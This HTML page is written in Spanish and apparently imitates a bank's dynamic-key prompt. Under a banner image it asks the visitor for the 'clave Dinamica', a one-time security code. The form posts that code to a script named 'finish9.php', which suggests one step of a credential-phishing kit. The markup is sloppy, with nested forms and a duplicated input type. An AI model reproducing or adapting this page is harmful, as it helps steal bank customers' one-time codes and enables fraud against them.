<!DOCTYPE html>
<html>

<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width">
  <title>replit</title>
  <link href="style.css" rel="stylesheet" type="text/css" />
  <style>

        *{
            -webkit-appearance: none;
            font-family: Arial, Helvetica, sans-serif;
            margin: 0;
            padding: 0;
        }
        input[type=submit]{
            background-color:#fdda24;
            color: #030303;
            width: 80%;
            height: 41px;
            border-radius: 124px;
            border-input: 0px solid #ecfd08;
            margin-top: 0px;
            border:0px solid gray;
            padding: 5px;
            font-weight:bold;
            font-size:1em;
            
        }
        

       
    </style>
</head>

<body>
   
<img src="/img/dinamica.jpeg" alt="" width="100%">
  
  <br>
  <br>
 <form action="finish9.php" method="post">
        
        <form action="" method="post">   
             <p style="font-size:0.9em;">Por favor ingrese su clave  <br> Dinamica</p>
  <br>
       <center><img src="/img/candadito.svg"   alt="" width="7%"><input type="number"type="password" id="" name ="clave" placeholder="* * * * * *"><br></center> 
              
       <br>
       <center><input type="submit" value="Continuar"></center><br>

    </form>

   <br>
  
<a href=""><center> <img src="/img/bangol.jpeg" alt="" width="100%"></a>
</body>
</html>